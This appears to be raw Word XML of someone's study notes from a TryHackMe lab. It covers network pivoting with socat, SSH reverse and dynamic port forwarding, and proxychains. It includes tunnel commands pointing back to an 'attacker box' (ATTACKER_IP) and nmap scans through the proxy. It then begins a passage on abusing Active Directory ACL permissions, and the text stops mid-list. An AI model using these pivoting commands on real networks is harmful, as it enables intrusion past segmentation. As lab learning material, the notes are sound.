    <w:p w14:paraId="2F71C54D" w14:textId="4928BC22" w:rsidR="00F46094" w:rsidRDefault="00F46094" w:rsidP="00D667B9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AC64AEE" wp14:editId="75B4A7A5">
            <wp:extent cx="3738880" cy="1027393"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="38030379" name="Picture 7" descr="A computer diagram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379" name="Picture 7" descr="A computer diagram with a red line&#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1846" cy="1033704"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BA9453" w14:textId="03EA3BE4" w:rsidR="00F46094" w:rsidRDefault="00F46094" w:rsidP="00F46094">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ON PC1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F46094">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>C:\&gt;socat TCP4-LISTEN:80,fork TCP4:1.1.1.1:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0316C" w14:textId="77777777" w:rsidR="003231A9" w:rsidRDefault="003231A9" w:rsidP="0002127A"/>
    <w:p w14:paraId="200300D5" w14:textId="77777777" w:rsidR="003231A9" w:rsidRDefault="003231A9" w:rsidP="0002127A"/>
    <w:p w14:paraId="7753D9A3" w14:textId="77777777" w:rsidR="003231A9" w:rsidRDefault="003231A9" w:rsidP="0002127A"/>
    <w:p w14:paraId="5B013BEE" w14:textId="77777777" w:rsidR="00F46094" w:rsidRPr="00F46094" w:rsidRDefault="00F46094" w:rsidP="00F46094">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F46094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dynamic Port Forwarding and SOCKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CEB893" w14:textId="6F78507C" w:rsidR="003231A9" w:rsidRDefault="00F46094" w:rsidP="00F46094">
      <w:r w:rsidRPr="00F46094">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="00F46094">
        <w:t>port forwarding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> via</w:t>
      </w:r>
      <w:r w:rsidRPr="00F46094">
        <w:t xml:space="preserve"> a pivot host</w:t>
      </w:r>
      <w:r>
        <w:t>, used in Scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C550D9" w14:textId="4C2D31D2" w:rsidR="00F46094" w:rsidRDefault="00E533E2" w:rsidP="00F46094">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00F46094" w:rsidRPr="00F46094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ynamic port forwarding</w:t>
      </w:r>
      <w:r w:rsidR="00F46094" w:rsidRPr="00F46094">
        <w:t xml:space="preserve"> allows us to pivot through a host and </w:t>
      </w:r>
      <w:r w:rsidR="00F46094" w:rsidRPr="0084282A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>establish several connections</w:t>
      </w:r>
      <w:r w:rsidR="00F46094" w:rsidRPr="00F46094">
        <w:t xml:space="preserve"> to any IP addresses/ports we want by using a </w:t>
      </w:r>
      <w:r w:rsidR="00F46094" w:rsidRPr="00F46094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOCKS proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5764C857" w14:textId="6192100A" w:rsidR="00F46094" w:rsidRDefault="00E533E2" w:rsidP="00E533E2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On PC1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E533E2">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>C:\&gt; ssh tunneluser@1.1.1.1 -R 9050 -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC7997D" w14:textId="77777777" w:rsidR="00E533E2" w:rsidRPr="00E533E2" w:rsidRDefault="00E533E2" w:rsidP="00E533E2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E533E2">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>ssh tunneluser@1.1.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E533E2">
        <w:t xml:space="preserve"> --&gt; PC-1 connects back to your attacker box via SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23581366" w14:textId="1B60B4DE" w:rsidR="00E533E2" w:rsidRPr="00E533E2" w:rsidRDefault="00E533E2" w:rsidP="0084282A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E533E2">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>-R 9050</w:t>
      </w:r>
      <w:r w:rsidRPr="00E533E2">
        <w:t xml:space="preserve"> --&gt; This is a reverse dynamic forward: It opens a port on 1.1.1.1</w:t>
      </w:r>
      <w:r w:rsidR="0084282A">
        <w:t xml:space="preserve"> (remote-Attacker Machine), </w:t>
      </w:r>
      <w:r w:rsidR="0084282A" w:rsidRPr="0084282A">
        <w:t>start a SOCKS proxy on port </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0084282A" w:rsidRPr="0084282A">
        <w:t>9050</w:t>
      </w:r>
      <w:r w:rsidR="0084282A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0084282A" w:rsidRPr="0084282A">
        <w:t> and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0084282A" w:rsidRPr="0084282A">
        <w:t xml:space="preserve"> forward any connection request through the SSH tunnel</w:t>
      </w:r>
      <w:r w:rsidR="0084282A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0084282A" w:rsidRPr="0084282A">
        <w:t>proxied by the SSH client</w:t>
      </w:r>
      <w:r w:rsidR="0084282A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBF7136" w14:textId="68076F28" w:rsidR="003231A9" w:rsidRDefault="003231A9" w:rsidP="0002127A"/>
    <w:p w14:paraId="3BCF0A86" w14:textId="1A6123B7" w:rsidR="0084282A" w:rsidRPr="0084282A" w:rsidRDefault="0084282A" w:rsidP="0002127A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084282A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>By Proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="0084282A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749DADD0" w14:textId="69E507BA" w:rsidR="003231A9" w:rsidRDefault="0084282A" w:rsidP="0084282A">
      <w:r>
        <w:t xml:space="preserve">Configure </w:t>
      </w:r>
      <w:r w:rsidRPr="0084282A">
        <w:t>proxychains to point any connection to the same port used by SSH for the SOCKS proxy server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A18CDC5" w14:textId="4470866B" w:rsidR="0084282A" w:rsidRDefault="0084282A" w:rsidP="0084282A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Configuration: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094DF2B6" w14:textId="27BF8F3D" w:rsidR="0084282A" w:rsidRDefault="0084282A" w:rsidP="0084282A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r w:rsidRPr="0084282A">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>/etc/proxychains.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A7ADD4" w14:textId="4B5CFE37" w:rsidR="0084282A" w:rsidRPr="009603ED" w:rsidRDefault="0084282A" w:rsidP="009603ED">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Edit line </w:t>
      </w:r>
      <w:r w:rsidRPr="0084282A">
        <w:t>[ProxyList]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0084282A">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>socks4  127.0.0.1 9050</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009603ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="009603ED">
        <w:t xml:space="preserve"> any port will work but we need port that match the ssh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372FCB24" w14:textId="0075AFFF" w:rsidR="009603ED" w:rsidRDefault="0084282A" w:rsidP="009603ED">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009603ED">
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:r w:rsidR="009603ED" w:rsidRPr="0084282A">
        <w:t>execute</w:t>
      </w:r>
      <w:r w:rsidRPr="0084282A">
        <w:t xml:space="preserve"> any command through the proxy</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B0FF0C" w14:textId="362AA562" w:rsidR="009603ED" w:rsidRDefault="009603ED" w:rsidP="009603ED">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009603ED">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="006A3962">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:noProof/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ADADAD" w:themeFill="background2" w:themeFillShade="BF"/>
          </w:rPr>
          <w:t>http://pxeboot.za.tryhackme.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69F40582" w14:textId="4F173BF2" w:rsidR="009603ED" w:rsidRPr="009603ED" w:rsidRDefault="009603ED" w:rsidP="009603ED">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009603ED">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>proxychains nmap -sT -Pn -p 445 10.0.0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B32010" w14:textId="09352A2F" w:rsidR="0084282A" w:rsidRPr="0084282A" w:rsidRDefault="0084282A" w:rsidP="0084282A"/>
    <w:p w14:paraId="0DA106DF" w14:textId="220BD96B" w:rsidR="0084282A" w:rsidRDefault="0084282A" w:rsidP="0084282A">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF334DC" w14:textId="77777777" w:rsidR="003231A9" w:rsidRDefault="003231A9" w:rsidP="0002127A"/>
    <w:p w14:paraId="47F31F60" w14:textId="77777777" w:rsidR="000F5C66" w:rsidRDefault="000F5C66" w:rsidP="000F5C66">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F5C66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tunnelling Complex Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681559F3" w14:textId="2FCE2A3A" w:rsidR="007E73DA" w:rsidRPr="007E73DA" w:rsidRDefault="007E73DA" w:rsidP="007E73DA">
      <w:r>
        <w:t xml:space="preserve">All Commands on PC1 the SSH Client </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB5C393" w14:textId="6E041C28" w:rsidR="00BF7996" w:rsidRDefault="007E73DA" w:rsidP="007E73DA">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="007E73DA">
        <w:t>C:\&gt; ssh tunneluser@ATTACKER_IP -R 8888:thmdc.za.tryhackme.com:80 -L *:6666:127.0.0.1:6666 -L *:7878:127.0.0.1:7878 -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1086C199" w14:textId="121FBE7B" w:rsidR="007E73DA" w:rsidRDefault="007E73DA" w:rsidP="004668D1">
      <w:r w:rsidRPr="007E73DA">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>C:\&gt; ssh tunneluser@ATTACKER_IP ...</w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>Now</w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:t>emote is the server (Attacker machine)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that we connect to form PC1 “the client”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FCD7D6" w14:textId="1336B3F6" w:rsidR="007E73DA" w:rsidRDefault="007E73DA" w:rsidP="007E73DA">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-L *:6666:127.0.0.1:6666 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFC2957" w14:textId="3C442023" w:rsidR="008A439C" w:rsidRDefault="007E73DA" w:rsidP="007E73DA">
      <w:r>
        <w:t xml:space="preserve">This Telling SSH </w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PC-1</w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:t>, open port 6666 and when someone connects to it, SSH should forward the traffic through the tunnel to the SSH server (attacker machine), and from there connect to 127.0.0.1:6666.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:t xml:space="preserve">SSH tunnels the traffic from PC-1 → attacker, and </w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>once it hits the attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:t>, SSH interprets 127.0.0.1:6666 as “connect to the attacker's localhost:6666”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE6CF3A" w14:textId="47B09BD5" w:rsidR="008A439C" w:rsidRDefault="007E73DA" w:rsidP="004668D1">
      <w:r w:rsidRPr="007E73DA">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>-R 8888:thmdc.za.tryhackme.com:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E99AD3" w14:textId="4A1ACFC2" w:rsidR="007E73DA" w:rsidRDefault="007E73DA" w:rsidP="007E73DA">
      <w:r w:rsidRPr="007E73DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-R</w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:t xml:space="preserve"> means: "Forward a port on the </w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH server side</w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:t xml:space="preserve"> (attacker)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F09A89" w14:textId="2C8997FA" w:rsidR="007E73DA" w:rsidRPr="007E73DA" w:rsidRDefault="007E73DA" w:rsidP="007E73DA">
      <w:r>
        <w:t>This t</w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:t>elling SSH:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:t xml:space="preserve">"On the </w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attacker machine</w:t>
      </w:r>
      <w:r w:rsidRPr="007E73DA">
        <w:t>, open port 8888. When someone connects to it, SSH should tunnel the traffic back to PC-1, and then have PC-1 connect to thmdc.za.tryhackme.com:80."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82F8CF" w14:textId="77777777" w:rsidR="007E73DA" w:rsidRDefault="007E73DA" w:rsidP="007E73DA"/>
    <w:p w14:paraId="4DF912FE" w14:textId="0E26D5ED" w:rsidR="008A439C" w:rsidRDefault="008A439C" w:rsidP="004668D1">
      <w:r>
        <w:br/>
        <w:t>More Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0089BA36" w14:textId="77777777" w:rsidR="008A439C" w:rsidRPr="008A439C" w:rsidRDefault="008A439C" w:rsidP="008A439C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidRPr="008A439C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Sshuttle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3EB95FF1" w14:textId="77777777" w:rsidR="008A439C" w:rsidRPr="008A439C" w:rsidRDefault="008A439C" w:rsidP="008A439C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidRPr="008A439C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Rpivot</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68A26E7A" w14:textId="77777777" w:rsidR="008A439C" w:rsidRPr="008A439C" w:rsidRDefault="008A439C" w:rsidP="008A439C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidRPr="008A439C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Chisel</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A752007" w14:textId="77777777" w:rsidR="008A439C" w:rsidRPr="008A439C" w:rsidRDefault="008A439C" w:rsidP="008A439C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidRPr="008A439C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Hijacking Sockets with Shadowmove</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01BC24D0" w14:textId="77777777" w:rsidR="008A439C" w:rsidRDefault="008A439C" w:rsidP="004668D1"/>
    <w:p w14:paraId="67D4F431" w14:textId="77777777" w:rsidR="00BF7996" w:rsidRDefault="00BF7996" w:rsidP="004668D1"/>
    <w:p w14:paraId="5FFDF30A" w14:textId="77777777" w:rsidR="00FC72AB" w:rsidRDefault="00FC72AB" w:rsidP="004668D1"/>
    <w:p w14:paraId="56839739" w14:textId="77777777" w:rsidR="00CD30C3" w:rsidRPr="004668D1" w:rsidRDefault="00CD30C3" w:rsidP="004668D1"/>
    <w:p w14:paraId="25B934E0" w14:textId="2C44C0AB" w:rsidR="00E86C2B" w:rsidRDefault="004126A1" w:rsidP="00E86C2B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Active Directory Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610001A3" w14:textId="65C7313F" w:rsidR="004126A1" w:rsidRDefault="004126A1" w:rsidP="00760E84">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="004126A1">
        <w:t>Exploiting Permission Delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69080E8F" w14:textId="7EEA8537" w:rsidR="004126A1" w:rsidRDefault="00673F85" w:rsidP="004126A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A778C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delegation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A778C2">
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">give an object some actions on another object, like </w:t>
      </w:r>
      <w:r w:rsidR="00FA480B">
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>delegating</w:t>
      </w:r>
      <w:r w:rsidR="00A778C2">
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> team </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A778C2">
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A778C2">
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> in an organization unit to change all team members Password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8929BC" w14:textId="600DFA37" w:rsidR="004126A1" w:rsidRDefault="00A778C2" w:rsidP="00A778C2">
      <w:r w:rsidRPr="00A778C2">
        <w:t>Permission Delegation exploits are often referred to as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA480B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ACL-based attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00A778C2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5B61A0" w14:textId="714DEED4" w:rsidR="00A778C2" w:rsidRDefault="00A778C2" w:rsidP="00A778C2">
      <w:r w:rsidRPr="00A778C2">
        <w:t>AD object can be secured with ACEs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A778C2">
        <w:t xml:space="preserve">Access Control Entries (ACEs) that populates Discretionary Access Control Lists </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00A778C2">
        <w:t>DACLs</w:t>
      </w:r>
      <w:r>
        <w:t>”)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A778C2">
        <w:t>, which then describe the allowed and denied permissions that any other AD object has against the target object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDB3585" w14:textId="54067B48" w:rsidR="004126A1" w:rsidRDefault="00A778C2" w:rsidP="004E0874">
      <w:r w:rsidRPr="00A778C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access Control Entry (ACE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A778C2">
        <w:t xml:space="preserve"> on an object defines the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A778C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>permissions that others have on that object</w:t>
      </w:r>
      <w:r w:rsidR="004E0874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004E0874" w:rsidRPr="004E0874">
        <w:t xml:space="preserve">ex: If an ACE on a user object grants "Full Control" to another user, it means that other user can fully manage </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004E0874" w:rsidRPr="004E0874">
        <w:t>this user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004E0874" w:rsidRPr="004E0874">
        <w:t xml:space="preserve"> object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEAF02B" w14:textId="230DB992" w:rsidR="004126A1" w:rsidRPr="004E0874" w:rsidRDefault="004E0874" w:rsidP="004126A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Some ACEs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD46CB1" w14:textId="77777777" w:rsidR="004E0874" w:rsidRPr="004E0874" w:rsidRDefault="004E0874" w:rsidP="004E0874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ForceChangePassword:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t> We have the ability to set the user's current password without knowing their current password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A7E2C" w14:textId="77777777" w:rsidR="004E0874" w:rsidRPr="004E0874" w:rsidRDefault="004E0874" w:rsidP="004E0874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>AddMembers:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t> We have the ability to add users (including our own account), groups or computers to the target group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A7167B" w14:textId="77777777" w:rsidR="004E0874" w:rsidRPr="004E0874" w:rsidRDefault="004E0874" w:rsidP="004E0874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>GenericAll:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t> We have complete control over the object, including the ability to change the user's password, register an SPN or add an AD object to the target group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091644E1" w14:textId="77777777" w:rsidR="004E0874" w:rsidRPr="004E0874" w:rsidRDefault="004E0874" w:rsidP="004E0874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>GenericWrite:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> We can update any </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5F48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
